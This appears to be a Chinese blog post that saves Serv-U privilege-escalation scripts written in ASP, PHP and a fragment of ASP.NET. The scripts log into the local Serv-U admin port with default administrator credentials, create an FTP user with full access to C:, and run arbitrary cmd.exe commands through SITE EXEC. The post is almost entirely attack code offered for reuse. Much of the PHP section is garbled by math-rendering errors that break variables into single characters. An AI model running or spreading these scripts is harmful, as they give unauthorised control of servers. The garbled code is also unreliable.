脚本:网站的编辑语言
serv-u利用脚本(asp/aspx/php)
serv-u利用脚本(asp/aspx/php)
每次用都得搜,说不准那天就搜不到了,直接存起来是最好的选择.
<%@ LANGUAGE = VBScript %>
<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request(“action”)
if not isnumeric(action) then response.end
user = trim(request(“u”))
pass = trim(request(“p”))
port = trim(request(“port”))
cmd = trim(request(“c”))
f=trim(request(“f”))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = “User " & user & vbCrLf
loginpass = “Pass " & pass & vbCrLf
deldomain = “-DELETEDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & " PortNo=” & ftpport & vbCrLf
mt = “SITE MAINTENANCE” & vbCrLf
newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & " TZOKey=” & vbCrLf
newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _
“-HomeDir=c://” & vbCrLf & “-LoginMesFile=” & vbCrLf & “-Disable=0” & vbCrLf & “-RelPaths=1” & vbCrLf & _
“-NeedSecure=0” & vbCrLf & “-HideHidden=0” & vbCrLf & “-AlwaysAllowLogin=0” & vbCrLf & “-ChangePassword=0” & vbCrLf & _
“-QuotaEnable=0” & vbCrLf & “-MaxUsersLoginPerIP=-1” & vbCrLf & “-SpeedLimitUp=0” & vbCrLf & “-SpeedLimitDown=0” & vbCrLf & _
“-MaxNrUsers=-1” & vbCrLf & “-IdleTimeOut=600” & vbCrLf & “-SessionTimeOut=-1” & vbCrLf & “-Expire=0” & vbCrLf & “-RatioUp=1” & vbCrLf & _
“-RatioDown=1” & vbCrLf & “-RatiosCredit=0” & vbCrLf & “-QuotaCurrent=0” & vbCrLf & “-QuotaMaximum=0” & vbCrLf & _
“-Maintenance=System” & vbCrLf & “-PasswordType=Regular” & vbCrLf & “-Ratios=None” & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = “QUIT” & vbCrLf
newuser=replace(newuser,“c:”,f)
select case action
case 1
set a=Server.CreateObject(“Microsoft.XMLHTTP”)
a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “”
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session(“a”)=a
%>
<%=cmd%>
<%
case else
on error resume next
set a=session(“a”)
set b=session(“b”)
set c=session(“c”)
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
Serv-U 提升权限 ASP版 Goldsun[at]84823714 | |
用户名: | |
口 令: | |
端 口: | |
系统路径: | |
命 令: |
//变量初始化
$addr = ‘0.0.0.0’;
$ftpport = 21;
$adminport = 43958;
$adminuser = ‘LocalAdministrator’;
KaTeX parse error: Expected 'EOF', got '#' at position 14: adminpass = '#̲l@ak#.lk;0@P’;
$user = ‘wofeiwo’;
$password = ‘wrsky’;
$homedir = ‘C://’;
$dir = ‘C://WINNT//System32//’;
//有改变则赋值
if ($_GET){
$addr = $_GET[‘addr’] ;
$ftpport = $_GET[‘ftpport’] ;
$adminport = $_GET[‘adminport’] ;
$adminuser = $_GET[‘adminuser’] ;
$adminpass = $_GET[‘adminpass’] ;
$user = $_GET[‘user’] ;
$password = $_GET[‘password’] ;
$homedir =
G
E
T
[
′
h
o
m
e
d
i
r
′
]
;
i
f
(
_GET['homedir'] ; if (
GET[′homedir′];if(_GET[‘dir’]){
$dir = $_GET[‘dir’] ;
}
}
?>
添加Serv-U用户部分
主机IP: | |
主机Ftp端口: | |
主机Ftp管理端口: | |
主机Ftp管理用户: | |
主机Ftp管理密码: | |
添加的用户名: | |
添加的用户名密码: | |
用户主目录(别忘了写"/"): | |
命令回显: <?php
//添加用户
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …n']=="up"){ up(addr,
f
t
p
p
o
r
t
,
ftpport,
ftpport,adminport,
a
d
m
i
n
u
s
e
r
,
adminuser,
adminuser,adminpass,
u
s
e
r
,
user,
user,password,$homedir);
}
?>
主机Ftp端口: | |
用户名: | |
用户名密码: | |
系统路径(别忘了写"/"): | |
执行的命令: |
命令回显: <?php
//执行命令
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …cute"){ ftpcmd(ftpport,
u
s
e
r
,
user,
user,password,
d
i
r
,
dir,
dir,_GET[‘cmd’]);
}
?>
//添加用户主函数定义
function up(
a
d
d
r
,
addr,
addr,ftpport,
a
d
m
i
n
p
o
r
t
,
adminport,
adminport,adminuser,
a
d
m
i
n
p
a
s
s
,
adminpass,
adminpass,user,
p
a
s
s
w
o
r
d
,
password,
password,homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno,
e
r
r
s
t
r
,
8
)
;
i
f
(
!
errstr, 8); if (!
errstr,8);if(!fp) {
echo “
e
r
r
s
t
r
(
errstr (
errstr(errno)
/n”;
} else {
fputs (
f
p
,
"
U
S
E
R
"
.
fp, "USER ".
fp,"USER".adminuser."/r/n");
sleep (1);
fputs (
f
p
,
"
P
A
S
S
"
.
fp, "PASS ".
fp,"PASS".adminpass."/r/n");
sleep (1);
fputs (
f
p
,
"
S
I
T
E
M
A
I
N
T
E
N
A
N
C
E
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
fp, "SITE MAINTENANCE/r/n"); sleep (1); fputs (
fp,"SITEMAINTENANCE/r/n");sleep(1);fputs(fp, “-SETUSERSETUP/r/n”);
fputs (
f
p
,
"
−
I
P
=
"
.
fp, "-IP=".
fp,"−IP=".addr."/r/n");
fputs (
f
p
,
"
−
P
o
r
t
N
o
=
"
.
fp, "-PortNo=".
fp,"−PortNo=".ftpport."/r/n");
fputs (
f
p
,
"
−
U
s
e
r
=
"
.
fp, "-User=".
fp,"−User=".user."/r/n");
fputs (
f
p
,
"
−
P
a
s
s
w
o
r
d
=
"
.
fp, "-Password=".
fp,"−Password=".password."/r/n");
fputs (
f
p
,
"
−
H
o
m
e
D
i
r
=
"
.
fp, "-HomeDir=".
fp,"−HomeDir=".homedir."/r/n");
fputs (
f
p
,
"
−
L
o
g
i
n
M
e
s
F
i
l
e
=
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-LoginMesFile=/r/n"); fputs (
fp,"−LoginMesFile=/r/n");fputs(fp, “-Disable=0/r/n”);
fputs (
f
p
,
"
−
R
e
l
P
a
t
h
s
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-RelPaths=0/r/n"); fputs (
fp,"−RelPaths=0/r/n");fputs(fp, “-NeedSecure=0/r/n”);
fputs (
f
p
,
"
−
H
i
d
e
H
i
d
d
e
n
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-HideHidden=0/r/n"); fputs (
fp,"−HideHidden=0/r/n");fputs(fp, “-AlwaysAllowLogin=0/r/n”);
fputs (
f
p
,
"
−
C
h
a
n
g
e
P
a
s
s
w
o
r
d
=
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-ChangePassword=1/r/n"); fputs (
fp,"−ChangePassword=1/r/n");fputs(fp, “-QuotaEnable=0/r/n”);
fputs (
f
p
,
"
−
M
a
x
U
s
e
r
s
L
o
g
i
n
P
e
r
I
P
=
−
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-MaxUsersLoginPerIP=-1/r/n"); fputs (
fp,"−MaxUsersLoginPerIP=−1/r/n");fputs(fp, “-SpeedLimitUp=-1/r/n”);
fputs (
f
p
,
"
−
S
p
e
e
d
L
i
m
i
t
D
o
w
n
=
−
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-SpeedLimitDown=-1/r/n"); fputs (
fp,"−SpeedLimitDown=−1/r/n");fputs(fp, “-MaxNrUsers=-1/r/n”);
fputs (
f
p
,
"
−
I
d
l
e
T
i
m
e
O
u
t
=
600
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-IdleTimeOut=600/r/n"); fputs (
fp,"−IdleTimeOut=600/r/n");fputs(fp, “-SessionTimeOut=-1/r/n”);
fputs (
f
p
,
"
−
E
x
p
i
r
e
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Expire=0/r/n"); fputs (
fp,"−Expire=0/r/n");fputs(fp, “-RatioUp=1/r/n”);
fputs (
f
p
,
"
−
R
a
t
i
o
D
o
w
n
=
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-RatioDown=1/r/n"); fputs (
fp,"−RatioDown=1/r/n");fputs(fp, “-RatiosCredit=0/r/n”);
fputs (
f
p
,
"
−
Q
u
o
t
a
C
u
r
r
e
n
t
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-QuotaCurrent=0/r/n"); fputs (
fp,"−QuotaCurrent=0/r/n");fputs(fp, “-QuotaMaximum=0/r/n”);
fputs (
f
p
,
"
−
M
a
i
n
t
e
n
a
n
c
e
=
S
y
s
t
e
m
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Maintenance=System/r/n"); fputs (
fp,"−Maintenance=System/r/n");fputs(fp, “-PasswordType=Regular/r/n”);
fputs (
f
p
,
"
−
R
a
t
i
o
s
=
N
o
n
e
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Ratios=None/r/n"); fputs (
fp,"−Ratios=None/r/n");fputs(fp, " Access=".
h
o
m
e
d
i
r
.
"
∣
R
W
A
M
E
L
C
D
P
/
r
/
n
"
)
;
f
p
u
t
s
(
homedir."|RWAMELCDP/r/n"); fputs (
homedir."∣RWAMELCDP/r/n");fputs(fp, “QUIT/r/n”);
sleep (1);
while (!feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … { echo fgets (fp,128);
}
}
}
//执行命令主函数定义
function ftpcmd(
f
t
p
p
o
r
t
,
ftpport,
ftpport,user,
p
a
s
s
w
o
r
d
,
password,
password,dir,$cmd){
$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);
if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: …nn_id) { echo "errstr (KaTeX parse error: Expected 'EOF', got '}' at position 16: errno)<br>/n"; }̲ else { fputs (conn_id, "USER ".
u
s
e
r
.
"
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
user."/r/n"); sleep (1); fputs (
user."/r/n");sleep(1);fputs(conn_id, "PASS ".
p
a
s
s
w
o
r
d
.
"
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
password."/r/n"); sleep (1); fputs (
password."/r/n");sleep(1);fputs(conn_id, “SITE EXEC “.
d
i
r
.
"
c
m
d
.
e
x
e
/
c
"
.
dir."cmd.exe /c ".
dir."cmd.exe/c".cmd.”/r/n”);
fputs (
c
o
n
n
i
d
,
"
Q
U
I
T
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
w
h
i
l
e
(
!
f
e
o
f
(
conn_id, "QUIT/r/n"); sleep (1); while (!feof(
connid,"QUIT/r/n");sleep(1);while(!feof(conn_id)) {
echo fgets (KaTeX parse error: Expected 'EOF', got '}' at position 15: conn_id,128); }̲ fclose(conn_id);
}
}
//去除转义字符
function stripslashes_array(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … { while (list(key,
v
a
r
)
=
e
a
c
h
(
var) = each(
var)=each(array)) {
if ($key != ‘argc’ && KaTeX parse error: Expected 'EOF', got '&' at position 15: key != 'argv' &̲& (strtoupper(key) !=
k
e
y
∣
∣
′
′
.
i
n
t
v
a
l
(
key || ''.intval(
key∣∣′′.intval(key) == "KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_string(var)) {
a
r
r
a
y
[
array[
array[key] = stripslashes(KaTeX parse error: Expected 'EOF', got '}' at position 7: var); }̲ if (is_array(var)) {
a
r
r
a
y
[
array[
array[key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>
from Serv-U 2 admin by lake2
Name LocalAdministrator
PWD #l@$ak#.lk;0@P
Port 43958
cmd